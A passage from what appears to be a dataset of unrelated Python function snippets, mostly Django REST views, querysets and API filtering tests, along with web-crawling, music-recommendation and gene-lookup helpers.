entry[\"response\"][\"content\"][\"text\"] != \"\":\r\n tempObject['url'] = entry[\"request\"][\"url\"]\r\n tempObject['response'] = entry[\"response\"][\"content\"][\"text\"].encode('ascii', 'ignore')\r\n matches.append(tempObject)\r\n return matches", 
"def request_more_resources():\n logger.info(\"NEED MORE RESOURCES!!!!\")", "def _handle_get(self, request, *args, **kwargs):\n self.URL_VARIABLES = {\n 'vendor_location_id': kwargs.get('vendor_location_id'),\n 'vendor_id': kwargs.get('vendor_id')\n }\n\n results = Meal.objects.prefetch_related('vendor_location__vendor__images', 'images').filter(\n vendor_location__pk=kwargs.get('vendor_location_id'),\n vendor_location__vendor__pk=kwargs.get('vendor_id')).order_by('available_starting')\n\n show_deleted = request.QUERY_PARAMS.get('show_deleted', False)\n\n if show_deleted in ['false', 0, False]:\n results = results.filter(is_deleted=False)\n\n return self.list_results(request, results, MealSerializer, use_cache=True, cache_time=self.CACHE_30_DAYS,\n cache_version=1)", "def test_get_offers(self):\n pass", "def retrieve_offers(search_string):\n return reducer((retrieve_offers_html, parse_offers_html), search_string)", "def recommendations(\n self,\n seed_artists=None,\n seed_genres=None,\n seed_tracks=None,\n limit=20,\n country=\"from_token\",\n filter_manele=True,\n **kwargs,\n ):\n params = dict(limit=limit)\n if seed_artists:\n params[\"seed_artists\"] = \",\".join(map(self._get_artist_id, seed_artists))\n if seed_genres:\n params[\"seed_genres\"] = \",\".join(seed_genres)\n if seed_tracks:\n params[\"seed_tracks\"] = \",\".join(map(self._get_track_id, seed_tracks))\n if country:\n params[\"market\"] = country\n for attribute in list(AudioFeature):\n for prefix in [\"min_\", \"max_\", \"target_\"]:\n param = prefix + attribute.value\n if param in kwargs:\n params[param] = kwargs.pop(param)\n\n if not filter_manele:\n return self._get(API.RECOMMENDATIONS.value, **params, **kwargs)\n\n for _ in range(5):\n result = self._get(API.RECOMMENDATIONS.value, **params, **kwargs)\n tracks = [\n t\n for t in result.tracks\n if not any(\n \"manele\" in (a.genres or []) or a.id in MANELISTI for a in t.artists\n )\n ]\n if tracks:\n result.tracks = tracks\n return result\n return self._get(API.RECOMMENDATIONS.value, **params, **kwargs)", "def get_queryset(self):\n qs = super(RetiresmartzAdviceViewSet, self).get_queryset()\n # Check user object permissions\n user = SupportRequest.target_user(self.request)\n return qs.filter_by_user(user)", "def test_list_referrals_by_desc_object(self):\n user = factories.UserFactory()\n referrals = [\n factories.ReferralFactory(\n state=models.ReferralState.RECEIVED,\n object=\"First by alphabetical order\",\n post__users=[user],\n urgency_level=models.ReferralUrgency.objects.get(\n duration=timedelta(days=1)\n ),\n ),\n factories.ReferralFactory(\n state=models.ReferralState.RECEIVED,\n object=\"Second by alphabetical order\",\n post__users=[user],\n urgency_level=models.ReferralUrgency.objects.get(\n duration=timedelta(days=1)\n ),\n ),\n ]\n\n self.setup_elasticsearch()\n response = self.client.get(\n f\"/api/referrallites/?user={user.id}&sort=object.keyword&sort_dir=desc\",\n HTTP_AUTHORIZATION=f\"Token {Token.objects.get_or_create(user=user)[0]}\",\n )\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json()[\"count\"], 2)\n self.assertEqual(response.json()[\"results\"][0][\"id\"], referrals[1].id)\n self.assertEqual(response.json()[\"results\"][1][\"id\"], referrals[0].id)", "def test_get_with_filter_person(mockclient_cl1):\n r = mockclient_cl1.get(TEST_URL + \"?size=100&p=P00022\")\n assert r.status_code == 200\n assert len(r.json[\"statements\"]) == 6", "def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model):\n explore = 
fc.get_explores(\n model=test_model[\"name\"], explore=\"explore_2_joins_1_used\"\n )[0]\n field_stats = {\n \"explore_2_joins_1_used.d1\": 10,\n \"explore_2_joins_1_used.d2\": 5,\n \"explore_2_joins_1_used.d3\": 0,\n \"explore_2_joins_1_used.m1\": 0,\n \"join1.d1\": 10,\n \"join1.d2\": 10,\n \"join1.d3\": 10,\n \"join1.m1\": 0,\n \"join2.d1\": 0,\n \"join2.d2\": 0,\n \"join2.d3\": 0,\n \"join2.m1\": 0,\n }\n join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats)\n assert isinstance(join_stats, dict)\n assert len(join_stats) == 2\n assert join_stats == {\"join1\": 30, \"join2\": 0}", "def test_explore_get_list_only_published(self):\n story1 = create_story(title=\"Test Story\", summary=\"Test Summary\",\n byline=\"Test Byline\", status='published')\n \n story2 = create_story(title=\"Test Story 2\", summary=\"Test Summary 2\",\n byline=\"Test Byline 2\", status='draft')\n resp = self.api_client.get('/api/0.1/stories/explore/')\n self.assertValidJSONResponse(resp)\n self.assertEqual(len(self.deserialize(resp)['objects']), 1)\n self.assertEqual(self.deserialize(resp)['objects'][0]['story_id'], story1.story_id)", "def list(self,request,*args,**kwargs):\n response=super(ListAPIView,self).list(request,*args,**kwargs)\n #add applied_filters to the response which is set when filter_queryset method is called\n response=self.addAppliedFilters(response)\n #fetch data from the related views\n return self.fetch_related(request,response,*args,**kwargs)", "def get_queryset(self):\n reviews = Review.objects \\\n .filter(reviewer=self.request.user) \\\n .filter(closed_on=None) \\\n .order_by('due_date') \\\n .select_related()\n\n reviews = self.step_filter(reviews)\n\n self.search_form = self.get_search_form(reviews)\n reviews = self.search_form.filter_reviews()\n\n return reviews", "def query(url):", "def test_get_with_filter_factoid(mockclient_cl1):\n r = mockclient_cl1.get(TEST_URL + \"?size=100&f=F00062\")\n assert r.status_code == 200\n assert len(r.json[\"statements\"]) == 3", "def get(self, request, *args, **kwargs):\n return super(PopularSongsView, self).get(request, query=app.MOST_POPULAR_SONGS, *args, **kwargs)", "def get_overview(entities=None):\n \n url = \"{ep}/views/overview\".format(ep=endpoint)\n \n if entities is not None:\n qs = {}\n for e in entities:\n qs.update({'entityId': e})\n \n r = requests.get(url, headers=headers, params=qs)\n else:\n r = requests.get(url, headers=headers)\n \n return r.json()", "def obj_get_list(self, request=None, **kwargs):\n filters = {}\n if hasattr(request, 'GET'):\n # Grab a mutable copy.\n filters = request.GET.copy()\n\n # Update with the provided kwargs.\n filters.update(kwargs)\n if \"community\" in filters:\n try:\n community = Community.objects.get(\n uuid=uuid_from_uri(filters['community']))\n im = community.image_set.filter(is_active=True)\n wb = community.wordbox_set.filter(is_active=True)\n base_object_list = sorted(chain(im, wb),\n key=attrgetter('created_time'))[::-1]\n return self.apply_authorization_limits(request,\n base_object_list)\n except ValueError:\n raise BadRequest(\"Invalid resource lookup data provided \"\n \"(mismatched type).\")\n else:\n raise BadRequest(\"Invalid filtering parameter\")", "def test_and_filtros(self): \n response = self.client.get('/apirest/expedientes/?tipo=PROYECTO&firm_persona_fisica_id=1566')\n self.assertEqual(response.data[\"count\"],self.CANT_EXPEDIENTES_X_FIRMANTE)\n self.assertEqual(response.data[\"results\"][0][\"tipo\"], self.TIPO_PROYECTO)\n 
self.assertEqual(response.data[\"results\"][0][\"periodo\"], self.PERIODO)", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def _explore(self, iterable):\n raise NotImplementedError(\"Should have implemented this.\")", "def get_queryset(self):\n return ArticleRating.objects.filter(article=self.get_object())", "def get(self) -> list:\n return self.__expedition", "def test_export_data_multiple_explorations(self) -> None:\n # Add two more explorations.\n user_models.ExplorationUserDataModel(\n id='%s.%s' % (self.USER_1_ID, self.EXP_ID_THREE),\n user_id=self.USER_1_ID,\n exploration_id=self.EXP_ID_THREE, rating=5,\n rated_on=self.DATETIME_OBJECT,\n draft_change_list={'new_content': {'content': 3}},\n draft_change_list_last_updated=self.DATETIME_OBJECT,\n draft_change_list_exp_version=2,\n draft_change_list_id=2,\n furthest_reached_checkpoint_exp_version=1,\n furthest_reached_checkpoint_state_name='checkpoint3',\n most_recently_reached_checkpoint_exp_version=1,\n most_recently_reached_checkpoint_state_name='checkpoint2').put()\n\n user_data = user_models.ExplorationUserDataModel.export_data(\n self.USER_1_ID)\n\n expected_data = {\n self.EXP_ID_ONE: {\n 'rating': 2,\n 'rated_on_msec': self.DATETIME_EPOCH,\n 'draft_change_list': {'new_content': {}},\n 'draft_change_list_last_updated_msec': self.DATETIME_EPOCH,\n 'draft_change_list_exp_version': 3,\n 'draft_change_list_id': 1,\n 'mute_suggestion_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'mute_feedback_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'furthest_reached_checkpoint_exp_version': 1,\n 'furthest_reached_checkpoint_state_name': 'checkpoint1',\n 'most_recently_reached_checkpoint_exp_version': 1,\n 'most_recently_reached_checkpoint_state_name': 'checkpoint1'\n },\n self.EXP_ID_TWO: {\n 'rating': None,\n 'rated_on_msec': None,\n 'draft_change_list': None,\n 'draft_change_list_last_updated_msec': None,\n 'draft_change_list_exp_version': None,\n 'draft_change_list_id': 0,\n 'mute_suggestion_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'mute_feedback_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'furthest_reached_checkpoint_exp_version': None,\n 'furthest_reached_checkpoint_state_name': None,\n 'most_recently_reached_checkpoint_exp_version': None,\n 'most_recently_reached_checkpoint_state_name': None\n },\n self.EXP_ID_THREE: {\n 'rating': 5,\n 'rated_on_msec': self.DATETIME_EPOCH,\n 'draft_change_list': {'new_content': {'content': 3}},\n 'draft_change_list_last_updated_msec': self.DATETIME_EPOCH,\n 'draft_change_list_exp_version': 2,\n 'draft_change_list_id': 2,\n 'mute_suggestion_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'mute_feedback_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'furthest_reached_checkpoint_exp_version': 1,\n 'furthest_reached_checkpoint_state_name': 'checkpoint3',\n 'most_recently_reached_checkpoint_exp_version': 1,\n 'most_recently_reached_checkpoint_state_name': 'checkpoint2'\n 
}\n }\n self.assertDictEqual(expected_data, user_data)", "def exp_learnedPredicates(self, **kwargs):\n\n entries={}\n for condition in self.exp_predicates.keys():\n text = '%s: %s' % (condition, self.exp_predicates[condition])\n entries[text] = self.readCommandLine\n\n title = \"Ce qu'a appris Baxter pour effectuer le deplacement\" \n self.mm.addGenericMenu(\"expMenu\", self.mm.cur_page, title, entries)\n self.mm.loadMenu(\"expMenu\")", "def test_impact_for_exp_with_no_ratings(self):\n # Sign up a user and have them create an exploration.\n user_a_id = self._sign_up_user(\n self.USER_A_EMAIL, self.USER_A_USERNAME)\n self._create_exploration(self.EXP_ID_1, user_a_id)\n user_stats_model = user_models.UserStatsModel.get(\n user_a_id, strict=False)\n self.assertEqual(user_stats_model, None)", "def exactor_links(self, response: BeautifulSoup):\n raise NotImplementedError", "def find_experiments(model, version, page_index=0):\n\n # We use filter queries instead of regular boolean queries.\n # This is done so that the sort order isn't influenced.\n # We may need to add additional sorting to make a sensible resultset.\n search_query = {\n 'query': {\n 'bool': {\n 'filter': [\n {'term': {'model': model}},\n {'term': {'version': version}}\n ]\n }\n }\n }\n\n results = find_items('experiment', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for item in results['hits']['hits']:\n records.append({\n 'model': item['_source']['model'],\n 'version': item['_source']['version'],\n 'name': item['_source']['experiment'],\n 'date_created': item['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def test_api_can_get_filtered_issues_list(self):\n path = '/issues/?language=python&tech_stack=django&experience_needed=moderate'\n response = self.client.get(path, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertGreater(len(api_response_issues), len(json.loads(response.content)))", "def extract(self, entity, depth=2, page_max=80):\n\n self.logger.info(\"Website : %s\" % entity[\"url\"])\n pages = self.cs.get_crawl_by_url(entity[\"url\"], depth=depth, max_pages=page_max)\n self.logger.info(\"%d pages for crawl of url %s\" % (len(pages), entity[\"url\"]))\n\n entity_report = self._init_entity_report(entity)\n firstpage = True\n\n desc = None\n counter = 0\n for p in pages:\n html = p.content\n relevant_txt = p.relevant_txt\n metas = self.extract_metas(html, relevant_txt, p.url, firstpage, country=entity[\"country\"], lang=p.lang)\n firstpage = False\n\n # Tagcloud\n if relevant_txt is not None:\n entity_report[\"summary\"].add_text(relevant_txt)\n\n # Metas\n for m in metas:\n if metas[m] is not None:\n counter += 1\n\n # -- Special cases initialization --\n if m == \"prices\":\n if len(metas[m]) > 0:\n entity_report[\"ecommerce_meta\"][\"pages_with_prices\"] += 1\n entity_report[\"prices_per_page\"].append(len(metas[m]))\n\n if m in [\"payment_options\", \"delivery_options\"]:\n if len(metas[m]) > 0:\n entity_report[\"ecommerce_meta\"][m].update(metas[m])\n\n if m == \"contact\":\n for cont in metas[m]:\n cont.depth = p.depth\n cont.source = p.url\n\n # -- General cases 
__\n if m in entity_report.str_attributes:\n entity_report[m] = metas[m]\n elif m in entity_report.social_attributes:\n # For now, meta extractor returns only one social\n # account / page\n entity_report[m][metas[m]] = 0\n elif m in entity_report.list_attributes:\n if type(metas[m]) != list:\n # Manages values returned 'alone' but wen want to aggregate\n metas[m] = [metas[m]]\n for el in metas[m]:\n entity_report[m].append(el)\n elif type(metas[m]) == list:\n for el in metas[m]:\n entity_report[m].add(el)\n else:\n if type(metas[m]) == list or type(metas[m]) == set:\n entity_report[m].update(metas[m])\n else:\n entity_report[m].add(metas[m])\n\n # Checking if seems to be homepage\n if p.url.strip(\" /\") == \"http://\" + p.domain.strip(\" /\"):\n # Checking if seems to be homepage:\n if \"description\" in metas.keys() and metas[\"description\"] is not None:\n desc = metas[\"description\"]\n\n # end for p in pages\n entity_report.normalize(len(pages))\n\n social_accounts = {}\n for social in entity_report.social_attributes:\n social_accounts[social] = self.social_scorer.score(domain=entity_report[\"domain\"],\n social=social,\n accounts=entity_report.get(social, {}))\n\n # Format social fields for insertion in DB\n entity_report[social] = social_accounts[social]\n\n # Metadesc is always the description from the website\n if desc is not None:\n entity_report[\"metadescription\"] = desc\n\n # Get the best account’s description for each social network\n fb_desc = get_best_facebook_account_description(social_accounts.get(\"facebook\"))\n tw_desc = get_best_twitter_account_description(social_accounts.get(\"twitter\"))\n\n # Put all descs we collected in a list\n # We filter out very long descriptions (666 is a serious measure).\n descs = [d for d in (desc, fb_desc, tw_desc) if d is not None and len(d) < 666]\n # When meta desc AND social desc are available, the longest\n # is usually the best one.\n descs = sorted(descs, key=lambda d: len(d), reverse=True)\n desc = None if len(descs) == 0 else descs[0]\n\n if desc is not None:\n entity_report[\"description\"] = desc\n\n # Aggregate extracted outlink domains\n if \"outlinks\" in entity_report.keys():\n agg = {}\n for (domain, count) in entity_report[\"outlinks\"]:\n if domain is not None:\n if domain in agg:\n agg[domain] += 1\n else:\n agg[domain] = 1\n entity_report[\"outlinks\"] = agg\n\n self.logger.info(\"Computed Website [%s] - %d metas extracted\" %\n (entity[\"domain\"], counter))\n\n return entity_report", "def test_list_referrals_by_desc_units_requesters(self):\n user = factories.UserFactory(unit_name=\"a_unite\")\n referrals = [\n factories.ReferralFactory(\n state=models.ReferralState.RECEIVED,\n post__users=[factories.UserFactory(unit_name=\"c_unite\"), user],\n urgency_level=models.ReferralUrgency.objects.get(\n duration=timedelta(days=1)\n ),\n ),\n factories.ReferralFactory(\n state=models.ReferralState.RECEIVED,\n post__users=[factories.UserFactory(unit_name=\"b_unite\"), user],\n urgency_level=models.ReferralUrgency.objects.get(\n duration=timedelta(days=1)\n ),\n ),\n ]\n\n self.setup_elasticsearch()\n response = self.client.get(\n f\"/api/referrallites/?user={user.id}&sort=users_unit_name_sorting&sort_dir=asc\",\n HTTP_AUTHORIZATION=f\"Token {Token.objects.get_or_create(user=user)[0]}\",\n )\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json()[\"count\"], 2)\n self.assertEqual(response.json()[\"results\"][0][\"id\"], referrals[0].id)\n self.assertEqual(response.json()[\"results\"][1][\"id\"], 
referrals[1].id)", "def do_fetch(self):\n pass", "def list(self, request):\n exp = Experiment.objects.all()\n serializer = ExperimentSerializer(exp, many=True)\n return send_response(request.method, serializer)", "def test_view_telescope_night(self):\n telescope_name = 'super_big_telescope'\n instrument_name = 'awesome_instrument'\n create_exposures(telescope_name, instrument_name, 2013, 8, 5)\n create_exposures(telescope_name, instrument_name, 2013, 8, 6)\n create_exposures(telescope_name, instrument_name, 2013, 8, 7)\n expected_exposures = [\n '<Exposure: %s 2013/08/06 run 1>' % telescope_name,\n '<Exposure: %s 2013/08/06 run 2>' % telescope_name,\n ]\n response = self.client.get(reverse(\n 'observations:night', args=('super_big_telescope','2013','8','6')))\n self.assertQuerysetEqual(response.context['exposure_list'], \n expected_exposures)", "def _orgWithLogoQuery(model, program):\n q = model.all()\n q.filter('scope', program)\n q.filter('status', 'active')\n q.filter('logo_url >=', '')\n\n return q", "def test_get_filtered_list_limit(self):\n flexmock(errata).should_receive(\"Advisory\").and_return(None)\n\n response = flexmock(status_code=200)\n response.should_receive(\"json\").and_return(test_structures.example_erratum_filtered_list)\n\n flexmock(errata.requests).should_receive(\"get\").and_return(response)\n\n res = errata.get_filtered_list(limit=1)\n self.assertEqual(1, len(res))", "def test_list_filtering(self):\n # Test the \"all\" response.\n url = '/api/users/?all=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.contract_user.email)\n self.assertContains(response, self.del_user.email)\n self.assertContains(response, self.shared.email)\n # Test filtering by ad_deleted.\n url = '/api/users/?ad_deleted=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.del_user.email)\n self.assertNotContains(response, self.user1.email)\n url = '/api/users/?ad_deleted=false'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertNotContains(response, self.del_user.email)\n self.assertContains(response, self.user1.email)\n # Test filtering by email (should return only one object).\n url = '/api/users/?email={}'.format(self.user1.email)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n j = response.json()\n self.assertEqual(len(j['objects']), 1)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)\n # Test filtering by GUID (should return only one object).\n url = '/api/users/?ad_guid={}'.format(self.user1.ad_guid)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n j = response.json()\n self.assertEqual(len(j['objects']), 1)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)\n # Test filtering by cost centre (should return all, inc. 
inactive and contractors).\n url = '/api/users/?cost_centre={}'.format(self.cc2.code)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.user2.email)\n self.assertContains(response, self.contract_user.email)\n self.assertContains(response, self.del_user.email)\n self.assertNotContains(response, self.user1.email)\n self.assertNotContains(response, self.shared.email) # Belongs to CC1.\n # Test filtering by O365 licence status.\n self.user1.o365_licence = True\n self.user1.save()\n url = '/api/users/?o365_licence=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)", "def query(self):\r\n records = self.input()\r\n if self.to_investigate:\r\n records = self.investigate(records)\r\n post.log.info(\"Caching {} records for {}\".format(len(records), self.name))\r\n self.cache_records(records)", "def get_model_queryset(model, request=None):\n if request:\n preview_draft = ('preview' in request.GET and 'draft' in request.GET)\n edit_mode = ('edit' in request.GET or request.session.get('cms_edit', False))\n if preview_draft or edit_mode: \n return model.objects.drafts()\n # Default case / moderator is used but there is no request\n return model.objects.public()", "def get_recommendations(self, hashes, limit=5):\n response = self.fetch(\"/recommend\", {\n \"num\": limit,\n }, method=\"POST\", body=self.encode_feed_hashes(hashes))\n\n return response", "def fetch_gene_descriptions(self, metrics, coeff='cohen', nih_fetch_num=20, alpha=.05, **kwargs):\n if 'verbose' not in kwargs:\n kwargs['verbose'] = True\n if 'nih_dl' not in kwargs:\n kwargs['nih_dl'] = False\n\n if kwargs['nih_dl'] == False:\n if 'csv_path' not in kwargs:\n raise ValueError(\"'csv_path' argument in **kwargs missing; provide argument or use 'nih_dl':True .\")\n\n top_genes = []\n if coeff == 'cohen':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, list):\n raise ValueError(\"list passed with coeff='cohen'; if you want to use Spearman's Rho use coeff='spearman'.\")\n\n for rec in metrics['results'][:nih_fetch_num]:\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(rec.entrez))\n else:\n gene_dat = get_local_gene_info(kwargs['csv_path'], [rec.entrez])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((rec.entrez, rec.cohen_d, rec.p_value, gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha / float(metrics['gene_sample_size']))\n for eid, coh_d, p_val, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (p = %.3E; d = %.3f): < No description found >\\n\\n\" % (eid, p_val, coh_d)\n else:\n print \"%d (p = %.3E; d = %.3f): %s\\n\\n\" % (eid, p_val, coh_d, descr)\n elif coeff == 'spearman':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, dict):\n raise ValueError(\"dict passed with coeff='spearman'; if you want to use Cohen's d use coeff='cohen'.\")\n\n top_ids = np.argsort(metrics)[:nih_fetch_num]\n\n top_rs = [r for r in reversed(np.sort(metrics))][:nih_fetch_num]\n top_genes = []\n for x in xrange(len(top_ids)):\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(top_ids[x]))\n else:\n gene_dat = get_gene_info(kwargs['csv_path'], [top_ids[x]])\n gene_name = 
gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((int(top_ids[x]), top_rs[x], gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha/float(len(self.no.ge.keys())))\n for eid, rho, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (r = %.3f): < No description found >\\n\\n\" % (eid, rho)\n else:\n print \"%d (r = %.3f): %s\\n %s\\n\\n\" % (eid, rho, gene_i, descr)\n\n else:\n raise ValueError(\"Invalid parameter value for 'coeff'; use 'spearman' or 'cohen'.\")\n\n return top_genes", "def _extract_articles(self, target):\n feed_response, modified, etag = self._get_recent_feed(target)\n\n # Bozo is a tag which tells that the RSS hasn't been parsed correctly.\n if feed_response.bozo:\n exc = feed_response.bozo_exception\n if not isinstance(exc, self.ALLOWED_EXCEPTIONS):\n raise exc\n\n articles = []\n count = 0\n if self._manage_status(feed_response, target):\n for feed_entry in feed_response.entries:\n if self._limit and count >= self._limit:\n logging.info(\n \"Crawling limit of %d article(s) was reached for this target.\",\n count\n )\n break\n try:\n article = self.extract_article(feed_entry, target)\n except Exception as exc:\n # NOTE(cmiN): On Stackdriver Error Reporting we don't want to catch\n # (with `logging.exception`) \"Not Found\" errors, because they are\n # pretty frequent and usual, therefore ignore-able.\n log_function = (\n logging.error if \"404\" in str(exc) else logging.exception\n )\n log_function(\"Got %s while parsing %r.\", exc, feed_entry.id)\n else:\n articles.append(article)\n count += 1\n target.checkpoint(modified, etag)\n\n return articles", "def getItems(self): \n \n kwargs = {}\n kwargs[\"max\"] = {\"deals.mocality.co.ke\" : 1, \"www.zetu.co.ke\":1, \"manual\":2}\n from frontpage import get_deals\n items = get_deals(self.context, self.request, **kwargs)\n return items", "def step_filter(self, qs):\n return qs", "def get_history_promotion(request):\n response = ApiJsonResponse()\n try:\n user = MyUser.objects.get(pk=request.user.pk)\n except ObjectDoesNotExist:\n return Response({\n \"msg\": _('MSG_USER_NOT_EXIST'),\n \"status\": 404\n }, status=404)\n try:\n coupons = Coupon.objects.filter(user=user, distributed=True)\n except ObjectDoesNotExist:\n response.set_data(\"[]\")\n response.set_result_code(200)\n response.set_result_msg(\"MSG_PROMOTIONS_NOT_FOUNDED\")\n return JsonResponse(response.get_dict())\n favorite = False\n user_actions = None\n for coupon in coupons:\n favorite = False\n try:\n Favorite.objects.get(promotion=coupon.promotion, user=user)\n favorite = True\n except ObjectDoesNotExist:\n pass\n try:\n user_actions = UserSocialAction.objects.get(promotion=coupon.promotion, user=user)\n except ObjectDoesNotExist:\n pass\n# if coupon.promotion.end_date < timezone.now():\n response.set_multiples_data(serialize_promotion_object(coupon.promotion, favorite, user_actions))\n response.set_result_code(200)\n response.set_result_msg(\"MSG_PROMOTIONS_FOUNDED\")\n return JsonResponse(response.get_dict())", "def explore_all_nf_data():\n request = app.current_request\n resource_type = request.query_params[\"resource_type\"]\n offset = int(request.query_params[\"offset\"])\n limit = int(request.query_params[\"limit\"])\n explorer = UnogsExplorer(resource_type)\n success = explorer.explore(limit, offset)\n return {\"success\": success}", "def filter(self, skip_cache=True, **lookup_vars):\n\n url = 
self.get_collection_url(**lookup_vars)\n\n if skip_cache:\n cached_response = None\n else:\n cached_response = self.get_from_cache('GET', url)\n\n if cached_response:\n response = cached_response\n else: \n response = self._request('GET', url)\n\n self.validate_collection_response(response)\n\n serializer = self.get_serializer()\n r_data = serializer.deserialize(to_unicode(response.content))\n collection_field = self.model._meta.get('collection_field')\n if collection_field and collection_field in r_data:\n obj_list = r_data[collection_field]\n\n extra_data = r_data.copy()\n del(extra_data[collection_field])\n\n else:\n obj_list = r_data\n extra_data = {}\n\n if obj_list:\n try:\n obj_list[0].keys\n except (KeyError, AttributeError):\n raise ValueError('expected list of dictionaries')\n\n resource_list = [self.model(**obj_dict) for obj_dict in obj_list]\n\n if not skip_cache:\n self.cache_response(response)\n\n return ListWithAttributes(resource_list, extra_data)", "def candidates_for(self, model, exclude_recipients=None,\n exclude_keywords=None):\n querysets = import_string(settings.INTERLINK_QUERYSETS)\n candidates = querysets.relevant_objects(model)\n\n keywords = [\n self.available_keywords_of(objects, donor=model,\n exclude_recipients=exclude_recipients,\n exclude_keywords=exclude_keywords)\n for objects in candidates\n ]\n return islice(idiverse(keywords), settings.INTERLINK_LINKS_PER_PAGE)", "def query_fetch(self, **kwargs):\n return iterate_with_exp_backoff(self._client.query(**kwargs).fetch())", "def queryset(self, request: 'HttpRequest', queryset: 'QuerySet') -> 'QuerySet':\n queryset = queryset.annotate(citation_count=Count('images'))\n if self.value() == 'Yes':\n return queryset.exclude(citation_count__lt=2)\n if self.value() == 'No':\n return queryset.filter(citation_count__gte=2)", "def _load_enriched_results(self):\n return super().load_results()", "def test_get_filtered_list(self):\n flexmock(errata).should_receive(\"Advisory\").and_return(None)\n\n response = flexmock(status_code=200)\n response.should_receive(\"json\").and_return(test_structures.example_erratum_filtered_list)\n\n flexmock(errata.requests).should_receive(\"get\").and_return(response)\n\n res = errata.get_filtered_list()\n self.assertEqual(2, len(res))", "def queryset(self, request):\n qs = super(ShortURLAdmin, self).queryset(request)\n if request.user.has_perm('deflect.list_all'):\n return qs\n return qs.filter(creator=request.user)", "def get_examinee():\n try:\n user_id = authenticate_token(request)\n examiner = is_examiner(user_id)\n getting_own_results = is_self(user_id)\n if examiner or getting_own_results:\n results_query = db.session.query(User, func.count(ExamRecording.user_id)).\\\n outerjoin(ExamRecording, ExamRecording.user_id==User.user_id).\\\n group_by(User.user_id)\n\n results, next_page_exists = filter_results(results_query, User)\n users = []\n for u, er_count in results:\n users.append({\n **u.to_dict(),\n 'exam_recordings':er_count\n })\n return jsonify({'users':users, 'next_page_exists':next_page_exists}), 200\n \n return jsonify({'user_id': user_id, 'message': ['access denied, not examiner']}), 403\n except (Exception, exc.SQLAlchemyError) as e:\n print(traceback.format_exc())\n return jsonify({ 'message': e.args }), 500", "def test_search_collection_filters():\n col = Collection(search='forest', object_type=['layer'], filters={'provider': 'gee'}, app=['gfw'])\n assert len(col) > 1", "def get_exposure(exposure_id,b_mean,b_sd,c_mean,c_sd,non_rate,dist_type,mortalities):#id in db\n\te_id 
